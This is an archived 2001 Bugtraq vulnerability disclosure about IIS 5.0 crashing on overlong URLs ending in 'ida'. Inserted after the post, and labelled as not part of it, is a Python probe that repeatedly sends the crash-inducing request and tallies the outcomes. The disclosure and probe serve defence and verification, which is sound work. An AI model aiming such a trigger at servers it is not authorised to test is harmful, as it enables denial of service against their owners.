Description:

MS IIS 5.0 has problems handling a specific form of URL ending with "ida".
The extension ida has been taken from the Bugtraq posting "IIS revealing webdirectories".
The problem causes 2 kinds of results.
The one result is that the server responds with a message like
"URL String too long"; "Cannot find the specified path"

The other error causes the server to terminate with an Access Violation.
When the server "Access violates" it displays as last message:

File
d:\http\..........................................................................................................................................................................................................................................................???????.
Error 0xc0000005 caught while processing query

Reproducing:

As described above, the server gives out, on one and the same string, 2+ error messages.
The string will be hosted on an external site, so it doesn't produce too much email traffic for Bugtraq.
You find the string at: www.packetshield.de/iisstring.txt (25KB)
(Use the Netscape browser to view the file, because MS IE5.0 has a bug preventing viewing txt files in one row, which cuts off a large piece of the string. You can still view it with the "View source" of MS IE5.0. The last 3 bytes of the string are "ida", then the URL is complete.)

As described above there are 2+ kinds of messages:

1) Access Violation with a display on the website you request
2) URL too long
3) Cannot find the specified path

(3) output:
File d:\http\..........................................................................................................................................................................................................................................................????.
The system cannot find the path specified.

With one and the same string you get one of the 3 messages. The Access Violation error comes about every 20 times you request. (don't ask me why)

I have 2 screenshots where 2 of the messages are displayed.
The system I have tried it out on is a cluster where each backs up the other in case of failure.
Because of that reason I cannot say with any guarantee whether the process dies or not, because I got redirected to another server.

The screenshots can be viewed at:
http://www.packetshield.de/extra/crash1.jpg
http://www.packetshield.de/extra/crash2.jpg

Sorry the shots are so large (79,114KB, but Bitmap Editor can't compress better :-( )

I hope MS personnel can fix that bug quickly, because there is a chance of DoS'ing IIS webservers which have disabled "too long URL strings".
One server has the too-long-URL check enabled and gives out a "warning".

Temp. Solution:

Enable IIS to check for too long URL strings and block them.

I hope I didn't describe it in too difficult a way, but I still prefer describing it instead of giving an exploit which can be used by every kid without understanding how it works and just doing damage.

-------------------------------
Lark Lizerman
contact:
lizermanat_private
or
lark82at_private
-------------------------------
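The post's temporary fix is to have IIS reject overlong URLs before they reach the script mapping. The following is an added example, not code from the posting or from its author: a small probe that sends a long request path ending in "ida" and tallies which of the three outcomes quoted above comes back, so an administrator can confirm the length check is actually doing the blocking. The target host, the dot filler, the 25,000-byte length and the treatment of an HTTP 414 status as "the length check fired" are all assumptions; the original 25KB string is not reproduced here. The recognised error fragments are the ones quoted in the post.

```python
"""Probe whether a web server stops an overlong URL ending in "ida" before
handing it to the script handler, and classify the replies.

Added example, not part of the original posting.  Assumptions: the target
host, a '.' filler, a 25,000-byte path and mapping HTTP 414 to the
"URL too long" outcome.  The post's actual 25KB string is not reproduced.
"""
import http.client
import socket
from collections import Counter

PROBE_EXT = "ida"

# Error fragments quoted in the post; matched case-insensitively on the body.
SIGNATURES = {
    "access-violation": "error 0xc0000005 caught while processing query",
    "path-not-found": "the system cannot find the path specified",
    "url-too-long": "url string too long",
}


def build_probe_path(total_len, filler="."):
    """Return a request path of exactly total_len bytes: a leading '/',
    a run of filler bytes, and the last three bytes 'ida' (as in the post).
    The dot filler is an assumption; the post only shows dots in the echoed
    d:\\http\\... path."""
    if total_len < 1 + len(PROBE_EXT) + 1:
        raise ValueError("path too short to hold '/' + filler + 'ida'")
    body_len = total_len - 1 - len(PROBE_EXT)
    return "/" + (filler * body_len)[:body_len] + PROBE_EXT


def classify_response(status, body):
    """Map one HTTP reply onto the outcomes the post describes.
    Assumption: a 414 status counts as the length check firing even when
    the body carries no recognisable text."""
    if status == 414:
        return "url-too-long"
    low = body.lower()
    for label, needle in SIGNATURES.items():
        if needle in low:
            return label
    return "other"


def length_check_effective(counts):
    """True only if every probe was stopped by the URL-length check.  Any
    'path-not-found' or 'access-violation' means the long URL reached the
    script handler; 'no-response' means the server may have died."""
    return bool(counts) and set(counts) <= {"url-too-long"}


def probe(host, port=80, total_len=25000, attempts=25, timeout=10):
    """Send the probe `attempts` times (the post saw the access violation
    about once in 20 requests) and tally the classified outcomes."""
    path = build_probe_path(total_len)
    counts = Counter()
    for _ in range(attempts):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path)
            resp = conn.getresponse()
            body = resp.read().decode("latin-1", "replace")
            counts[classify_response(resp.status, body)] += 1
        except (OSError, socket.timeout, http.client.HTTPException):
            counts["no-response"] += 1
        finally:
            conn.close()
    return counts


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    tally = probe(target)
    print(dict(tally))
    print("URL-length check effective:", length_check_effective(tally))
```

Run it only against a server you are permitted to test; on an IIS 5.0 box without the length check the post says roughly one request in twenty produces the access violation, so a single request proves nothing, which is why the probe repeats and tallies.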
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:28:13 PDT